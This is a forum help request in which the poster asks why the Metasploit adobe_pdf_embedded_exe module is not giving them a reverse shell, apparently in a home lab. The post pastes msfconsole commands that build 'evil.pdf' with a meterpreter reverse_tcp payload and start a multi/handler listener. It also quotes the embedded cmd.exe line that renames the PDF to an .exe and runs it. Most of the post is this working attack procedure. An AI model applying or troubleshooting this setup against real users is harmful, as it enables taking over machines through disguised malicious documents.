What am I not doing right?



Hi,
It's been around 1 month since Colin Ames and valsmith of Metasploit released Metaphish and the adobe_pdf exploit (http://blog.attackresearch.com/publications/metaphish). I've been trying the adobe_pdf exploit for almost a month. After I transfer the PDF file to Windows, I still get a “c:\\windows\system32\cmd.exe /Q /C (if exist “%HOMEPATH%\My Documents\hi.pdf” (cd “%HOMEPATH%\My Documents”))&(if exist “%HOMEPATH%\Desktop\hi.pdf” (cd “%HOMEPATH%\Desktop”))&&(ren hi.pdf hi.exe&start hi.exe)” error and another error, “system cannot find the specified file”, on cmd, and my multi/handler doesn't pick up any reverse shells. I'm using Adobe 9 on Windows. I'm saving the PDF to my Windows desktop. Any pointers will be appreciated. The log is shown below. I have also tried out a new adobe_pdf module by peterhefley here: http://trac.metasploit.com/ticket/335.
Pointers please…

msf exploit(handler) > back
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.20.1
LHOST => 192.168.20.1
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME hi.pdf
INFILENAME => hi.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Reading in ‘hi.pdf’…
[*] Parseing ‘hi.pdf’…
[*] Parseing Successfull.
[*] Using ‘windows/meterpreter/reverse_tcp’ as payload…
[*] Creating ‘evil.pdf’ file…
[*] Generated output file /pentest/exploits/framework3/data/exploits/evil.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >

msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.20.1
LHOST => 192.168.20.1
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…
